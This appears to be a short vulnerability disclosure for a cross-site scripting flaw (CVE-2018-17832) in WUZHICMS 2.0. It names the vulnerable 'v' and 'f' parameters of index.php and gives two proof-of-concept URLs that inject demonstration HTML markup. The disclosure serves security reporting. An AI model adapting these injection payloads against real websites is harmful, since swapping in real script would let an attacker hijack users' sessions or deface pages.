# Title: WUZHICMS 2.0 - Cross-Site Scripting # Author: Felipe "Renzi" Gabriel# Date: 2018-10-01# Vendor: http://www.wuzhicms.com# Software: WUZHICMS 2.0# CVE: CVE-2018-17832# Technical Details & Description:# A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0web-application.# The vulnerability is located in the 'v' and'f' parameters of the`index.php` action GET method request.# PoC
http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>
http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>
